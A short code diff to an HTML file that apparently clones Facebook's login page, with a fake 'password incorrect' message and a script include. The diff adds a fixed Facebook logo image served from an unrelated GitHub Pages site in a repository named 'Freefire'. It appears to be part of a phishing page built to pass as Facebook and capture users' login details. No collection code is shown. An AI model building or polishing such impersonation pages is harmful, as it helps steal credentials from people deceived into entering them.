--- a/facebook/index.html
+++ b/facebook/index.html
@@ -118,6 +118,9 @@
 <body>
     <script src="script.js"></script>
     <div class="msg"id="msg"style="color:red;display:none;"><p>Your password or username are incorrect</p></div>
+    <div style="position:fixed;">
+        <center><img src='https://sharmapushkar-coder.github.io/Freefire/facebook.svg'></center>
+    </div>
     <div class="container">
         <div class="login-box">
             <h2>Facebook Login</h2>
